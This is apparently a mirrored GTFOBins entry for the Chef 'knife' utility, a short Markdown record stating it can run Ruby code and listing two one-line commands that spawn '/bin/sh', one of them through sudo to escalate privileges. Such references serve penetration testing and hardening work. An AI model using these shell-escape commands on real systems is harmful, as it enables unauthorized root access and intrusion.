mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
ee3eb38ee4
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
11 lines
219 B
Markdown
11 lines
219 B
Markdown
---
|
|
description: This is capable of running [`ruby`](/gtfobins/ruby/) code.
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
knife exec -E 'exec "/bin/sh"'
|
|
sudo:
|
|
- code: |
|
|
sudo knife exec -E 'exec "/bin/sh"'
|
|
---
|